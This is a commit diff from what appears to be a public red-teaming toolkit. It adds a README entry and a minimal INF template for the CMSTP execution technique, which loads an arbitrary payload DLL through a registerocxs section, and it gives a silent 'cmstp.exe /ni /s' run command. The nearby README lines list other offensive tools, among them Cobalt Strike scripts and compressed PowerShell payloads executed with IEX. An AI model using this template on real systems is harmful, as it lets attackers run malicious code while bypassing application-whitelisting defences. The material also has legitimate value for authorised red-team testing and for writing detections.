cmstp-template

red-teaming/README.md

@@ -44,6 +44,12 @@ FullLanguage
 
 - **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
 
+- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
+
+```
+cmstp.exe /ni /s cmstp.inf
+```
+
 - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
 
 - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)

red-teaming/cmstp-template.inf

@@ -0,0 +1,12 @@
+[version]
+signature=$chicago$
+ 
+[defaultinstall_singleuser]
+registerocxs=r
+ 
+[r]
+C:\fully\qualified\path\to\payload.dll
+ 
+[strings]
+servicename=foobar
+shortsvcname=foobar